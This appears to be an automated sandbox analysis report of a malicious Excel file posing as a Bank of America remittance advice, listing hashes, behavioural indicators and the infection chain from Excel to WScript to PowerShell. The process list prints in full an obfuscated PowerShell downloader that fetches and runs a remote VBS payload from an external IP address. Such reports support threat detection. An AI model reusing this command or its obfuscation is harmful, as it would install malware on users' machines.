Analysis
-
max time kernel
112s -
max time network
139s -
platform
windows10-2004_x64 -
resource
win10v2004-20220812-en -
resource tags
arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system -
submitted
18-08-2022 09:00
Behavioral task
behavioral1
Sample
Remittance_Advice_BofA.xls
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Remittance_Advice_BofA.xls
Resource
win10v2004-20220812-en
General
-
Target
Remittance_Advice_BofA.xls
-
Size
129KB
-
MD5
ef647821a5b83276209b316934bad8ab
-
SHA1
1e01b86c162aad282434c34d13147dd404e8d59a
-
SHA256
adbbd78d5c79c11d3e5f723085b3d5d3fb2a34047a3e2a8791cdd764b78b08f7
-
SHA512
a2d6cb284376ac52fbeaf895b85e7924b17248b4af8b057c5c24990430963aa0a04a427a3aa2634e4d8594579c23411afa5bbc446933f2fee2bf65dd60e4f55c
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
WScript.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 4380 2696 WScript.exe EXCEL.EXE -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 13 2440 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000\Control Panel\International\Geo\Nation WScript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Modifies registry class 2 IoCs
Processes:
EXCEL.EXEdescription ioc process Set value (data) \REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots EXCEL.EXE Set value (data) \REGISTRY\USER\S-1-5-21-1502147629-2175634256-330282290-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff EXCEL.EXE -
NTFS ADS 1 IoCs
Processes:
EXCEL.EXEdescription ioc process File opened for modification C:\Users\Admin\AppData\Local\Temp\{4E5A521D-74E2-45B0-AC10-5FB1EAA0485A}\rkWwH.txt:Zone.Identifier EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 2696 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 2440 powershell.exe 2440 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 2440 powershell.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
Processes:
EXCEL.EXEpid process 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE 2696 EXCEL.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
EXCEL.EXEWScript.exedescription pid process target process PID 2696 wrote to memory of 4380 2696 EXCEL.EXE WScript.exe PID 2696 wrote to memory of 4380 2696 EXCEL.EXE WScript.exe PID 4380 wrote to memory of 2440 4380 WScript.exe powershell.exe PID 4380 wrote to memory of 2440 4380 WScript.exe powershell.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\Remittance_Advice_BofA.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\rkWwH.js"2⤵
- Process spawned unexpected child process
- Checks computer location settings
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ErrorActionPreference = 'SilentlyContinue' ;$t56fg = [Enum]::ToObject([System.Net.SecurityProtocolType], 3072);[System.Net.ServicePointManager]::SecurityProtocol = $t56fg;$we22='eW.teN tc' + 'ejbO-weN('; $b4df='olnwoD.)tnei' + 'lCb'; $c3=')''sbv.ew\''+pmet:vne$,''sbv.enixam/31.02.721.902//:ptth''(eliFda';$TC=$c3,$b4df,$we22 -Join '';IEX($TC|% {-join($_[-1..-$_.Length])});start-process($env:temp+ '\we.vbs');remove-item ($env:appdata + '\rkWwH.js')3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\rkWwH.jsFilesize
695B
MD5958e7511e960acbe7f862384301d972d
SHA1cb053892de113da9568f71ed9e0cde281ec1d8bd
SHA2564470c999e598819193ab3e7fd01398d9051f9009a78c4ad3b2230fb6686614b6
SHA5128a1c1a239b96737787a4934bc9edd3484efb41be5fce2d576220c8a8bd438d138866ba446986bd0b13958b1513f964106fc36038c8a9394780b2482ff78a2f10
-
memory/2440-144-0x00007FF9276A0000-0x00007FF928161000-memory.dmpFilesize
10.8MB
-
memory/2440-143-0x00007FF9276A0000-0x00007FF928161000-memory.dmpFilesize
10.8MB
-
memory/2440-142-0x00000213339A0000-0x00000213339C2000-memory.dmpFilesize
136KB
-
memory/2440-141-0x0000000000000000-mapping.dmp
-
memory/2696-136-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-138-0x00007FF90BF30000-0x00007FF90BF40000-memory.dmpFilesize
64KB
-
memory/2696-134-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-137-0x00007FF90BF30000-0x00007FF90BF40000-memory.dmpFilesize
64KB
-
memory/2696-135-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-133-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-132-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-146-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-147-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-148-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/2696-149-0x00007FF90E370000-0x00007FF90E380000-memory.dmpFilesize
64KB
-
memory/4380-139-0x0000000000000000-mapping.dmp